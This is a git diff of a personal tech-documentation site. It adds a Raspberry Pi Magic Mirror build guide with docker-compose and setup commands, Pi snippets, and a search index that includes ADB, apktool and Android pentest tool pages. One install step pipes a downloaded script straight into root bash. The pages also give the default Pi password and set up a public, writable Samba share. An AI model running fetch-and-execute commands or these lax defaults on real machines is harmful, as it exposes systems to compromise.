I've decided to test the controller for the LCD Panel inside the original iMac's body.
I've connected raspberry to the new monitor for the magicmirror testing and configuration.
Since my previous experience with my first magicmirror build, I've decided to add a Motion Sensor to the Raspberry Pi to detect the movement of the person infront of the mirror and turn the display on/off accordingly. The second thing i've added is a Power Button to turn the Raspberry Pi on, off and restart it without a physical access to the Raspberry Pi.
I couldn't find any open source projects for the functionality I needed of the power button and the Motion Sensor. So I've decided to create my own solution. Below are the scripts that I've created:
Thats how i've tested the functionality of the power button and the motion sensor.
I've ordered a reflective glass with 4 holes for mounting. It was a challenge to find a suitable reflective glass for the MagicMirror. The product I've found is not perfect - the glass is tinted, but it's a good enough solution and way better than the Glass Mirror Films I've used on my first Magic Mirror Project.
After I've done all the proofs of concept
that everything will work as I intended, I've continued to build the frame to house all the components.
I've used scrap wood I had laying around to build the frame and the mounting for the LCD panel, and the glass
For mounting the Magic Mirror to the wall i've used the smallest TV Mount I've found.
After the frame is built, I've added the electronics to the frame.
Performing a sanity check on the electronics and display assembly.
Since I went with the floating
effect, the glass isn't covering all of the frame; all the exposed parts of the glass need to be covered to avoid light leaking.
And the final Magic Mirror on the wall.
The Software The magicmirror is based on the MagicMirror project, running on Docker on Raspberry Pi OS.
Below the docker compose file for your reference.
version: '3'
+
+services:
+ magicmirror:
+ image: karsten13/magicmirror
+ container_name: magicmirror
+ hostname: magicmirror
+ restart: always
+ ports:
+ - 80:8080
+ volumes:
+ - ./config:/opt/magic_mirror/config
+ - ./modules:/opt/magic_mirror/modules
+ - ./css:/opt/magic_mirror/css
+ - /tmp/.X11-unix:/tmp/.X11-unix
+ - /opt/vc:/opt/vc/:ro
+ - /sys:/sys
+ - /usr/bin/vcgencmd:/usr/bin/vcgencmd
+ - /etc/localtime:/etc/localtime
+ devices:
+ - /dev/vchiq
+ environment:
+ - LD_LIBRARY_PATH=/opt/vc/lib
+ - DISPLAY=unix:0.0
+ - TZ=Asia/Jerusalem
+ - SET_CONTAINER_TIMEZONE=true
+ - CONTAINER_TIMEZONE=Asia/Jerusalem
+ shm_size: '1024mb'
+ command:
+ - npm
+ - run
+ - start
+
Back to top
\ No newline at end of file
diff --git a/raspberry-pi/projects/magic-mirror/index.html b/raspberry-pi/projects/magic-mirror/index.html
new file mode 100644
index 000000000..2d58bb4a7
--- /dev/null
+++ b/raspberry-pi/projects/magic-mirror/index.html
@@ -0,0 +1,211 @@
+ Magic Mirror - 3os raspberry-pi magic-mirror Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-06 Magic Mirror Magic Mirror Build Pictures 23" Samsung screen power resoldering:
Wooden frame initial fitting test on a glass with dual mirror film applied:
Testing the screen installation (frame removed) with power cords:
Testing black&white picture from a laptop after frame assembly:
Power, Lan, Usb external ports cutouts:
Fitted extended ports with wood filler:
Extended ports:
Assembly With screen, Raspberry Pi, cable routing, black material which do not pass light where there is no screen:
Adding some color for the frame:
Testing everything is working as it should be:
Full assembly behind the mirror:
Final Product:
Configuration Setup Change Display Rotation sudo nano /boot/config.txt
+
Add one of those according to your setup to the config file:
Code Description display_rotate=0 Normal display_rotate=1 90 degrees display_rotate=2 180 degrees display_rotate=3 270 degrees display_rotate=0x8000 horizontal flip display_rotate=0x20000 vertical flip
NOTE: You can rotate both the image and touch interface 180º by entering lcd_rotate=2 instead
Disabling the Screensaver Change to OPEN GL Driver
sudo nano /boot/config.txt
+
add this:
(Please note, you will need the x11-xserver-utils package installed.)
edit ~/.config/lxsession/LXDE-pi/autostart:
sudo nano ~/.config/lxsession/LXDE-pi/autostart
+
Add the following lines:
@xset s noblank
+@xset s off
+@xset -dpms
+
Edit /etc/lightdm/lightdm.conf:
sudo nano /etc/lightdm/lightdm.conf
+
Add the following line below [SeatDefaults]
xserver-command= X -s 0 -dpms
+
OS UI Finishes Make the Background Black:
Right click the Desktop
-> Desktop Preferences
and Change: Layout -> no image
Colour -> #000000
Hit ok.
Right click on the top panel
-> Panel Preferences
-> Appearance
Select Solid Color (With Opacity)
make sure Opacity at 0
Disable WiFi Power Save Edit /etc/modprobe.d/8192cu.conf
sudo nano /etc/modprobe.d/8192cu.conf
+
Add the following lines
# Disable power saving
+options 8192cu rtw_power_mgnt = 0 rtw_enusbss = 1 rtw_ips_mode = 1
+
For Raspberry Pi 3 Edit /etc/network/interfaces
sudo nano /etc/network/interfaces
+
Add the following line under the wlan0 section
allow-hotplug wlan0
+iface wlan0 inet manual
+wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
+wireless-power off
+
Reboot your PI
Disable Cursor on Startup sudo apt-get install unclutter
+
Installation first install node.js and npm
curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash -
+sudo apt-get install -y nodejs
+
and then run:
sudo npm install -g npm@latest
+
If you need to remove node and npm run this:
sudo apt-get remove nodejs nodejs-legacy nodered
+
Installation:
magicmirror-installation
say no to PM2 auto start - will be install manually
To Start from SSH:
cd ~/MagicMirror && DISPLAY = :0 npm start
+
pm2 auto start installation sudo npm install -g pm2
+cd ~
+nano mm.sh
+
add this to mm.sh and save:
#!/bin/sh
+
+cd ~/MagicMirror
+DISPLAY = :0 npm start
+
chmod +x mm.sh
+pm2 start mm.sh
+pm2 save
+pm2 startup
+
pm2 commands:
pm2 restart mm
+pm2 stop mm
+pm2 start mm
+pm2 log
+pm2 show mm
+
Logrotate Installation This will Retain for 14 days compress the logs.
pm2 install pm2-logrotate
+pm2 set pm2-logrotate:compress true
+pm2 set pm2-logrotate:retain 14
+pm2 set pm2-logrotate:max_size 10M
+
Back to top
\ No newline at end of file
diff --git a/raspberry-pi/snippets/index.html b/raspberry-pi/snippets/index.html
new file mode 100644
index 000000000..b0026d518
--- /dev/null
+++ b/raspberry-pi/snippets/index.html
@@ -0,0 +1,196 @@
+ Snippets - 3os raspberry-pi Snippets Enable SSH on Raspberry Pi Without a Screen Put the micro SD card into your computer You'll have to locate the boot directory at your SD card
for example:
All you have to do is create an empty file called ssh.
That's it. Insert the SD card to the Pi. You should have enabled SSH at boot.
Default User and Password After Installation User: pi
+Password: raspberry
+
Basic Configuration Update OS sudo apt-get update && sudo apt-get upgrade -y
+
Disable IPv6 on Raspberry Pi OS Edit "/etc/sysctl.conf":
sudo nano /etc/sysctl.conf
+
Add this to the end:
net.ipv6.conf.all.disable_ipv6=1
+net.ipv6.conf.default.disable_ipv6=1
+net.ipv6.conf.lo.disable_ipv6=1
+net.ipv6.conf.eth0.disable_ipv6 = 1
+
Save and close the file. Edit "/etc/rc.local":
sudo nano /etc/rc.local
+
Add this to the end (but before "exit 0"):
systemctl restart procps
+
Save and close the file. Reboot
Show Raspberry Temperature /opt/vc/bin/vcgencmd measure_temp
+
Samba for RaspberryPi sudo apt-get update
+sudo apt-get install -y samba samba-common-bin smbclient cifs-utils
+sudo smbpasswd -a pi ( my-pi-samba-remote-password )
+sudo nano /etc/samba/smb.conf
+
change:
workgroup = YOUR WINDOWS WORKGROUP NAME
+
add at end:
[ share]
+ path = /home/pi/Desktop/share
+ available = yes
+ valid users = pi
+ read only = no
+ browsable = yes
+ public = yes
+ writable = yes
+
the shared path must exist: ( if you work via desktop ( HDMI or VNC ) it is very convenient just to read or drop from/to this shared dir ) mkdir /home/pi/Desktop/share
Start samba Server
sudo /usr/sbin/service smbd start
+
Back to top
\ No newline at end of file
diff --git a/robots.txt b/robots.txt
new file mode 100644
index 000000000..3fa14834b
--- /dev/null
+++ b/robots.txt
@@ -0,0 +1,4 @@
+User-agent: *
+Allow: /
+
+Sitemap: https://3os.org/sitemap.xml
diff --git a/search/search_index.json b/search/search_index.json
new file mode 100644
index 000000000..c5e25919b
--- /dev/null
+++ b/search/search_index.json
@@ -0,0 +1 @@
+{"config": {"lang": ["en"], "separator": "[\\s\\-]+", "pipeline": ["stopWordFilter"]}, "docs": [{"location": "tags/", "title": "Tags and Categories", "text": ""}, {"location": "tags/#3g-modem", "title": "3g-modem", "text": " 3g Modem Host Configuration "}, {"location": "tags/#cookies", "title": "Cookies", "text": ""}, {"location": "tags/#git", "title": "Git", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#homelab", "title": "HomeLab", "text": ""}, {"location": "tags/#iid", "title": "IID", "text": " IID Generator & Validator "}, {"location": "tags/#nas", "title": "NAS", "text": " Synology NAS Free 80,443 Ports "}, {"location": "tags/#openssh", "title": "OpenSSH", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#proxmox", "title": "Proxmox", "text": ""}, {"location": "tags/#ssh", "title": "SSH", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#security", "title": "Security", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#synology", "title": "Synology", "text": ""}, {"location": "tags/#tweeks", "title": "Tweeks", "text": ""}, {"location": "tags/#ubuntu", "title": "Ubuntu", "text": ""}, {"location": "tags/#virtio", "title": "VirtIO", "text": ""}, {"location": "tags/#windows", "title": "Windows", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#windows-virtual-machines", "title": "Windows Virtual Machines", "text": ""}, {"location": "tags/#windwos", "title": "Windwos", "text": ""}, {"location": "tags/#adb", "title": "adb", "text": ""}, {"location": "tags/#admonition", "title": "admonition", "text": ""}, {"location": "tags/#affiliate", "title": "affiliate", "text": ""}, {"location": "tags/#android", "title": "android", "text": " ADB Cheat Sheet Apktool PT Application JADX Decompiler MobSF SSL Pinning Bypass "}, {"location": "tags/#apktool", "title": "apktool", "text": ""}, {"location": "tags/#application", "title": "application", "text": ""}, {"location": "tags/#autofs", "title": "autofs", 
"text": ""}, {"location": "tags/#automation", "title": "automation", "text": " DDNS Cloudflare Bash DDNS Cloudflare PowerShell Syncthing Motion Sensor Display Control "}, {"location": "tags/#bash", "title": "bash", "text": " DDNS Cloudflare Bash BrewUp "}, {"location": "tags/#cheat-sheet", "title": "cheat-sheet", "text": " ADB Cheat Sheet Npm Command-line Utility PM2 - Node.js Process Manager Pip Package Manager Supervisor Process Manager Virtual Environment Ruby Gem Package Manager Common Docker Commands Containers Cheat Sheet Images Cheat Sheet Docker Installation Networks & Links Cheat Sheet Security & Best Practices Git Cli Cheat Sheet Submodules Cheat Sheet GitHub Cli "}, {"location": "tags/#cheatsheet", "title": "cheatsheet", "text": " Gobuster CheatSheet Nmap CheatSheet XSS CheatSheet "}, {"location": "tags/#chrome", "title": "chrome", "text": ""}, {"location": "tags/#cli", "title": "cli", "text": ""}, {"location": "tags/#clickjacking", "title": "clickjacking", "text": ""}, {"location": "tags/#cloudflare", "title": "cloudflare", "text": " DDNS Cloudflare Bash DDNS Cloudflare PowerShell Pi-hole Cloudflare DNS Sync Let's Encrypt with Cloudflare UDM Cloudflare DDNS "}, {"location": "tags/#code-blocks", "title": "code-blocks", "text": ""}, {"location": "tags/#collation", "title": "collation", "text": ""}, {"location": "tags/#commands", "title": "commands", "text": ""}, {"location": "tags/#container", "title": "container", "text": ""}, {"location": "tags/#content-tabs", "title": "content-tabs", "text": ""}, {"location": "tags/#ddns", "title": "ddns", "text": " DDNS Cloudflare Bash DDNS Cloudflare PowerShell "}, {"location": "tags/#debian", "title": "debian", "text": ""}, {"location": "tags/#decompiler", "title": "decompiler", "text": ""}, {"location": "tags/#diagram", "title": "diagram", "text": ""}, {"location": "tags/#dns", "title": "dns", "text": " Pi-hole Cloudflare DNS Sync Pi-hole with DOH on Docker Free Port 53 on Ubuntu "}, {"location": 
"tags/#dns-over-https", "title": "dns-over-https", "text": " Pi-hole with DOH on Docker "}, {"location": "tags/#docker", "title": "docker", "text": " Pi-hole Cloudflare DNS Sync Pi-hole with DOH on Docker Common Docker Commands Containers Cheat Sheet Images Cheat Sheet Docker Installation Networks & Links Cheat Sheet Security & Best Practices Watchtower Docker on Raspberry Pi "}, {"location": "tags/#docker-compose", "title": "docker-compose", "text": ""}, {"location": "tags/#doh", "title": "doh", "text": " Pi-hole with DOH on Docker "}, {"location": "tags/#dsm", "title": "dsm", "text": ""}, {"location": "tags/#ed25519", "title": "ed25519", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#edgerouter", "title": "edgerouter", "text": ""}, {"location": "tags/#emojis", "title": "emojis", "text": ""}, {"location": "tags/#endorsements", "title": "endorsements", "text": ""}, {"location": "tags/#extensions", "title": "extensions", "text": " Chrome Extensions Firefox Extensions "}, {"location": "tags/#external-markdown", "title": "external-markdown", "text": ""}, {"location": "tags/#files-handling", "title": "files-handling", "text": ""}, {"location": "tags/#firefox", "title": "firefox", "text": ""}, {"location": "tags/#frida", "title": "frida", "text": ""}, {"location": "tags/#gem", "title": "gem", "text": ""}, {"location": "tags/#git_1", "title": "git", "text": " Git Cli Cheat Sheet GitHub Cli "}, {"location": "tags/#github", "title": "github", "text": " Removing Sensitive Data Git Cli Cheat Sheet Submodules Cheat Sheet GitHub Cli BrewUp "}, {"location": "tags/#gpu", "title": "gpu", "text": ""}, {"location": "tags/#headings", "title": "headings", "text": ""}, {"location": "tags/#history", "title": "history", "text": ""}, {"location": "tags/#homebrew", "title": "homebrew", "text": ""}, {"location": "tags/#horizontal-line", "title": "horizontal-line", "text": ""}, {"location": "tags/#htpasswd", "title": "htpasswd", "text": " htpasswd Password Generator "}, 
{"location": "tags/#iterm2", "title": "iTerm2", "text": ""}, {"location": "tags/#icons", "title": "icons", "text": ""}, {"location": "tags/#igpu", "title": "igpu", "text": " iGPU Passthrough to VM iGPU Split Passthrough "}, {"location": "tags/#images", "title": "images", "text": ""}, {"location": "tags/#information", "title": "information", "text": " Affiliate Disclosure Cookies Policy Website Endorsements MIT License Privacy Policy "}, {"location": "tags/#ipv6", "title": "ipv6", "text": " Disable IPv6 on Proxmox Disable IPv6 via Grub "}, {"location": "tags/#java", "title": "java", "text": ""}, {"location": "tags/#kali", "title": "kali", "text": ""}, {"location": "tags/#kali-linux", "title": "kali-linux", "text": ""}, {"location": "tags/#letsencrypt", "title": "letsencrypt", "text": " Let's Encrypt with Cloudflare "}, {"location": "tags/#license", "title": "license", "text": ""}, {"location": "tags/#links", "title": "links", "text": ""}, {"location": "tags/#linux", "title": "linux", "text": " Syncthing Better Terminal Experience Files Handling General Snippets Locales & Timezone LVM Partitions Memory & Swap SSH Hardening with SSH Keys Identify Network Interfaces "}, {"location": "tags/#lists", "title": "lists", "text": ""}, {"location": "tags/#locales", "title": "locales", "text": ""}, {"location": "tags/#lvm", "title": "lvm", "text": ""}, {"location": "tags/#macos", "title": "macOS", "text": " Applications Tweaks Enable Root User TouchID for sudo UI Tweaks Brew Snippets "}, {"location": "tags/#maco", "title": "maco", "text": " Pyenv-virtualenv Multi Version "}, {"location": "tags/#macos_1", "title": "macos", "text": " Syncthing Better Terminal Experience SSH Passphrase to Keychain Terminal Snippets BrewUp "}, {"location": "tags/#magic-mirror", "title": "magic-mirror", "text": ""}, {"location": "tags/#magicmirror", "title": "magicmirror", "text": ""}, {"location": "tags/#markdown", "title": "markdown", "text": " Disable IPV6 oh-my-zsh Install Snippets Awesome Pages 
Plugin "}, {"location": "tags/#markdown-cheatsheet", "title": "markdown-cheatsheet", "text": " About Markdown Admonitions Basic Formatting Code Blocks Content Tabs Diagrams Embed External Markdown Icons & Emojis Images Links Tables, Lists and Quotes "}, {"location": "tags/#mermaid", "title": "mermaid", "text": ""}, {"location": "tags/#metasploit", "title": "metasploit", "text": ""}, {"location": "tags/#mkdocs", "title": "mkdocs", "text": " About Markdown Admonitions Basic Formatting Code Blocks Content Tabs Diagrams Embed External Markdown Icons & Emojis Images Links Tables, Lists and Quotes "}, {"location": "tags/#motion-sensor", "title": "motion-sensor", "text": " Motion Sensor Display Control "}, {"location": "tags/#mount", "title": "mount", "text": ""}, {"location": "tags/#network", "title": "network", "text": " Proxmox Networking Identify Network Interfaces Declare Locations as \"Inside Your Local Network\" "}, {"location": "tags/#node", "title": "node", "text": " Npm Command-line Utility PM2 - Node.js Process Manager "}, {"location": "tags/#npm", "title": "npm", "text": " Npm Command-line Utility PM2 - Node.js Process Manager "}, {"location": "tags/#oh-my-zsh", "title": "oh-my-zsh", "text": " Better Terminal Experience oh-my-zsh on Synology NAS "}, {"location": "tags/#package-manager", "title": "package-manager", "text": " Pip Package Manager Ruby Gem Package Manager "}, {"location": "tags/#passthrough", "title": "passthrough", "text": " GPU Passthrough to VM iGPU Passthrough to VM iGPU Split Passthrough vGPU Split Passthrough "}, {"location": "tags/#penetration-testing", "title": "penetration-testing", "text": " Apktool PT Application MobSF Cli Commands Collation Gobuster CheatSheet Nmap CheatSheet XSS CheatSheet Bettercap 1.6.2 Installation Kali Linux "}, {"location": "tags/#pi-hole", "title": "pi-hole", "text": " Pi-hole Cloudflare DNS Sync Pi-hole with DOH on Docker "}, {"location": "tags/#pip", "title": "pip", "text": ""}, {"location": "tags/#pm2", 
"title": "pm2", "text": " PM2 - Node.js Process Manager "}, {"location": "tags/#portfolio", "title": "portfolio", "text": ""}, {"location": "tags/#ports", "title": "ports", "text": ""}, {"location": "tags/#powershell", "title": "powershell", "text": " DDNS Cloudflare PowerShell Windows SSH Server "}, {"location": "tags/#privacy-policy", "title": "privacy policy", "text": ""}, {"location": "tags/#process-manager", "title": "process-manager", "text": " PM2 - Node.js Process Manager "}, {"location": "tags/#processes-manager", "title": "processes-manager", "text": " Supervisor Process Manager "}, {"location": "tags/#proxmox_1", "title": "proxmox", "text": " Cloud Image Template Let's Encrypt with Cloudflare PVE Kernel Cleaner VM Disk Expander GPU Passthrough to VM iGPU Passthrough to VM iGPU Split Passthrough vGPU Split Passthrough Disable IPv6 on Proxmox Proxmox Networking "}, {"location": "tags/#pt", "title": "pt", "text": " Cli Commands Collation Links and Tools Metasploit Framework Wifite About Proxmark3 Proxmark3 CheatSheet Mifare Classic 1K ISO14443A Clickjacking Test Page IID Generator & Validator "}, {"location": "tags/#python", "title": "python", "text": " Pip Package Manager Supervisor Process Manager Virtual Environment Pyenv-virtualenv Multi Version "}, {"location": "tags/#quotes", "title": "quotes", "text": ""}, {"location": "tags/#raspberry-pi", "title": "raspberry-pi", "text": " Docker on Raspberry Pi External Power Button Motion Sensor Display Control Snippets 3g Modem Host Configuration Magic Mirror 2.0 Magic Mirror "}, {"location": "tags/#resume", "title": "resume", "text": ""}, {"location": "tags/#reverse-engineering", "title": "reverse-engineering", "text": ""}, {"location": "tags/#rfid", "title": "rfid", "text": " About Proxmark3 Proxmark3 CheatSheet Mifare Classic 1K ISO14443A "}, {"location": "tags/#rsa", "title": "rsa", "text": " SSH Hardening with SSH Keys "}, {"location": "tags/#rsa-keys", "title": "rsa-keys", "text": " SSH With RSA Keys 
Windows SSH Server "}, {"location": "tags/#ruby", "title": "ruby", "text": ""}, {"location": "tags/#security_1", "title": "security", "text": ""}, {"location": "tags/#servers", "title": "servers", "text": ""}, {"location": "tags/#share", "title": "share", "text": ""}, {"location": "tags/#smb", "title": "smb", "text": ""}, {"location": "tags/#snippets", "title": "snippets", "text": ""}, {"location": "tags/#ssh_1", "title": "ssh", "text": " Enable SSH Root Login SSH With RSA Keys SSH Hardening with SSH Keys "}, {"location": "tags/#ssh-server", "title": "ssh-server", "text": ""}, {"location": "tags/#ssl-pinning", "title": "ssl-pinning", "text": ""}, {"location": "tags/#submodules", "title": "submodules", "text": ""}, {"location": "tags/#supervisor", "title": "supervisor", "text": " Supervisor Process Manager "}, {"location": "tags/#syncthing", "title": "syncthing", "text": ""}, {"location": "tags/#synology_1", "title": "synology", "text": " Syncthing oh-my-zsh on Synology NAS Install VM Tools on Virtual Machine Auto DSM Config Backup Free 80,443 Ports Enable SSH Root Login SSH With RSA Keys "}, {"location": "tags/#tables", "title": "tables", "text": ""}, {"location": "tags/#template", "title": "template", "text": " Disable IPV6 oh-my-zsh Install Snippets Awesome Pages Plugin "}, {"location": "tags/#terminal", "title": "terminal", "text": " Better Terminal Experience TouchID for sudo "}, {"location": "tags/#text-highlighting", "title": "text-highlighting", "text": ""}, {"location": "tags/#timezone", "title": "timezone", "text": ""}, {"location": "tags/#tools", "title": "tools", "text": " Gobuster CheatSheet Nmap CheatSheet XSS CheatSheet Bettercap 1.6.2 Installation Links and Tools Metasploit Framework Wifite About Proxmark3 Proxmark3 CheatSheet Mifare Classic 1K ISO14443A Clickjacking Test Page IID Generator & Validator "}, {"location": "tags/#touchid", "title": "touchID", "text": ""}, {"location": "tags/#ubiquiti", "title": "ubiquiti", "text": " EdgeRouter CLI 
Commands Failover Telegram Notifications Persistent Boot Script Persistent SSH Keys Better Fan Speeds UDM Cloudflare DDNS Wireguard VPN "}, {"location": "tags/#ubuntu_1", "title": "ubuntu", "text": " Disable IPv6 via Grub Remove Snap Store Unattended Upgrades "}, {"location": "tags/#udm", "title": "udm", "text": " CLI Commands Failover Telegram Notifications Persistent Boot Script Persistent SSH Keys Better Fan Speeds UDM Cloudflare DDNS Wireguard VPN "}, {"location": "tags/#unifi", "title": "unifi", "text": " CLI Commands Failover Telegram Notifications Persistent Boot Script Persistent SSH Keys Better Fan Speeds UDM Cloudflare DDNS Wireguard VPN "}, {"location": "tags/#utilities", "title": "utilities", "text": " Useful Links & Tools Wifi QR Image Generator Useful Software Windows Servers Declare Locations as \"Inside Your Local Network\" Send Emails From The Windows Task Scheduler "}, {"location": "tags/#venv", "title": "venv", "text": ""}, {"location": "tags/#vgpu", "title": "vgpu", "text": ""}, {"location": "tags/#virtualization", "title": "virtualization", "text": " Cloud Image Template VM Disk Expander "}, {"location": "tags/#vmware", "title": "vmware", "text": ""}, {"location": "tags/#vmware-fusion", "title": "vmware-fusion", "text": ""}, {"location": "tags/#watchtower", "title": "watchtower", "text": ""}, {"location": "tags/#wifi", "title": "wifi", "text": ""}, {"location": "tags/#windows_1", "title": "windows", "text": " Syncthing Windows SSH Server Useful Software Windows Servers Declare Locations as \"Inside Your Local Network\" Send Emails From The Windows Task Scheduler "}, {"location": "tags/#wireguard", "title": "wireguard", "text": ""}, {"location": "tags/#zsh", "title": "zsh", "text": " Better Terminal Experience "}, {"location": "android/adb-cheat-sheet/", "title": "Android ADB Cheat Sheet", "text": "ADB, Android Debug Bridge, is a command-line utility included with Google's Android SDK. 
ADB can control your device over USB from a computer, copy files back and forth, install and uninstall apps, run shell commands, and more. ADB is a powerful tool that can be used to control your Android device from a computer. Below are some of the most common commands you can use with ADB and their usage. You can find more information about ADB and its usage by visiting the official website.
", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#common-adb-commands", "title": "Common ADB Commands", "text": "", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#push-a-file-to-download-folder-of-the-android-device", "title": "Push a file to Download folder of the Android Device", "text": "adb push example.apk /mnt/sdcard/Download/\n
", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#lists-all-the-installed-packages-and-get-the-full-paths", "title": "Lists all the installed packages and get the full paths", "text": "adb shell pm list packages -f\n
", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#pulls-a-file-from-android-device", "title": "Pulls a file from android device", "text": "adb pull /mnt/sdcard/Download/example.apk\n
", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#install-apk-from-host-to-android-device", "title": "Install apk from host to Android device", "text": "adb shell install example.apk\n
", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#install-apk-from-android-device-storage", "title": "Install apk from Android device storage", "text": "adb shell install /mnt/sdcard/Download/example.apk\n
", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#set-network-proxy", "title": "Set network proxy", "text": "adb shell settings put global http_proxy <address>:<port>\n
Disable network proxy
adb shell settings put global http_proxy :0\n
", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#adb-basics-commands", "title": "ADB Basics Commands", "text": "Command Description adb devices Lists connected devices adb connect 192.168.2.1 Connects to adb device over network adb root Restarts adbd with root permissions adb start-server Starts the adb server adb kill-server Kills the adb server adb reboot Reboots the device adb devices -l List of devices by product/model adb -s <deviceName> <command>
Redirect command to specific device adb \u2013d <command>
Directs command to only attached USB device adb \u2013e <command>
Directs command to only attached emulator", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#logs", "title": "Logs", "text": "Command Description adb logcat [options] [filter] [filter]
View device log adb bugreport Print bug reports", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#permissions", "title": "Permissions", "text": "Command Description adb shell permissions groups List permission groups definitions adb shell list permissions -g -r List permissions details", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#package-installation", "title": "Package Installation", "text": "Command Description adb shell install <apk>
Install app adb shell install <path>
Install app from phone path adb shell install -r <path>
Install app from phone path adb shell uninstall <name>
Remove the app", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#paths", "title": "Paths", "text": "Command Description /data/data/<package name>
/databases App databases /data/data/<package name>
/shared_prefs/ Shared preferences /mnt/sdcard/Download/ Download folder /data/app Apk installed by user /system/app Pre-installed APK files /mmt/asec Encrypted apps (App2SD) /mmt/emmc Internal SD Card /mmt/adcard External/Internal SD Card /mmt/adcard/external_sd External SD Card ------- ----------- adb shell ls List directory contents adb shell ls -s Print size of each file adb shell ls -R List subdirectories recursively adb shell pm path <package name>
Get full path of a package adb shell pm list packages -f Lists all the packages and full paths", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#file-operations", "title": "File Operations", "text": "Command Description adb push <local> <remote>
Copy file/dir to device adb pull <remote> <local>
Copy file/dir from device run-as <package>
cat <file>
Access the private package files", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#phone-info", "title": "Phone Info", "text": "Command Description adb get-stat\u0435 Print device state adb get-serialno Get the serial number adb shell dumpsys iphonesybinfo Get the IMEI adb shell netstat List TCP connectivity adb shell pwd Print current working directory adb shell dumpsys battery Battery status adb shell pm list features List phone features adb shell service list List all services adb shell dumpsys activity <package>/<activity>
Activity info adb shell ps Print process status adb shell wm size Displays the current screen resolution", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#package-info", "title": "Package Info", "text": "Command Description adb shell list packages Lists package names adb shell list packages -r Lists package name + path to apks adb shell list packages -3 Lists third party package names adb shell list packages -s Lists only system packages adb shell list packages -u Lists package names + uninstalled adb shell dumpsys package packages Lists info on all apps adb shell dump <name>
Lists info on one package adb shell path <package>
Path to the apk file", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#device-related-commands", "title": "Device Related Commands", "text": "Command Description adb reboot recovery Reboot device into recovery mode adb reboot fastboot Reboot device into recovery mode adb shell screencap -p \"/path/to/screenshot.png\" Capture screenshot adb shell screenrecord \"/path/to/record.mp4\" Record device screen adb backup -apk -all -f backup.ab Backup settings and apps adb backup -apk -shared -all -f backup.ab Backup settings, apps and shared storage adb backup -apk -nosystem -all -f backup.ab Backup only non-system apps adb restore backup.ab Restore a previous backup ------- ----------- adb shell am start -a android.intent.action.VIEW -d URL Opens URL adb shell am start -t image/* -a android.intent.action.VIEW Opens gallery", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/apktool/", "title": "Android Apktool for Reverse Engineering", "text": "A tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications. It also makes working with an app easier because of the project like file structure and automation of some repetitive tasks like building apk, etc.
It is NOT
intended for piracy and other non-legal uses. It could be used for localizing, adding some features or support for custom platforms, analyzing applications and much more.
", "tags": ["android", "penetration-testing", "reverse-engineering", "apktool"]}, {"location": "android/apktool/#download-and-documentation", "title": "Download and Documentation", "text": "Official Apktool Website
", "tags": ["android", "penetration-testing", "reverse-engineering", "apktool"]}, {"location": "android/apktool/#how-to-sign-apk-after-compile", "title": "How to Sign APK After Compile", "text": "In order to install modified APK on Android device, you need to sign it with a certificate. Android APK won't be signed by default. You need to sign it manually.
Install apksigner
apt install -y apksigner\n
Create certificate at the same folder you've compiled your modified APK
keytool -genkey -v -keystore keystore.jks -keyalg RSA -keysize 2048 -validity 10000\n
Enter a password (we will need it to sign the APK), enter any data you wish for the certificate information. At the end enter 'y' to create the certificate.
Now we should have 2 files: your.apk, keystore.jks. The only step left is to sign the APK with the new certificate.
apksigner sign --ks keystore.jks your.apk\n
When installing the APK you will be prompted with a warning of \"unknown certificate\" just hit Install.
", "tags": ["android", "penetration-testing", "reverse-engineering", "apktool"]}, {"location": "android/applications/", "title": "Penetration Testing Application for Android", "text": "List for Android penetration testing applications and tools that can be used to aid in penetration testing. The following are the most commonly used applications. Feel free to suggest new applications and tools at comments section below.
", "tags": ["android", "application", "penetration-testing"]}, {"location": "android/applications/#list-of-android-penetration-testing-tools-and-applications", "title": "List of Android Penetration Testing Tools and Applications", "text": " Magisk Manager - Systemless rooting system. EdXposed Manager - Companion Android application for EdXposed. BusyBox - Android busyBox. SQLite Editor Master - SQLite Editor. Root Explorer File Manager for Root Users (Root Required). CiLocks - Python script to brute force android lockscreen password. Network Analyzer - Network Analyzer for Android. Packet Capture - Packet capture/Network traffic sniffer. Material Terminal - Terminal for Android. Gplaycli Cli Tool to download APK form PlayStore. ", "tags": ["android", "application", "penetration-testing"]}, {"location": "android/jadx-decompiler/", "title": "JADX - Dex to Java Decompiler", "text": "Github Repository: skylot-jadx
", "tags": ["android", "decompiler", "java"]}, {"location": "android/jadx-decompiler/#about-jadx", "title": "About JADX", "text": "Command line and GUI tools for producing Java source code from Android Dex and Apk files
Please note that in most cases jadx can't decompile all 100% of the code, so errors will occur. Check Troubleshooting guide for workarounds
Main features:
decompile Dalvik bytecode to java classes from APK, dex, aar, aab and zip files decode AndroidManifest.xml
and other resources from resources.arsc
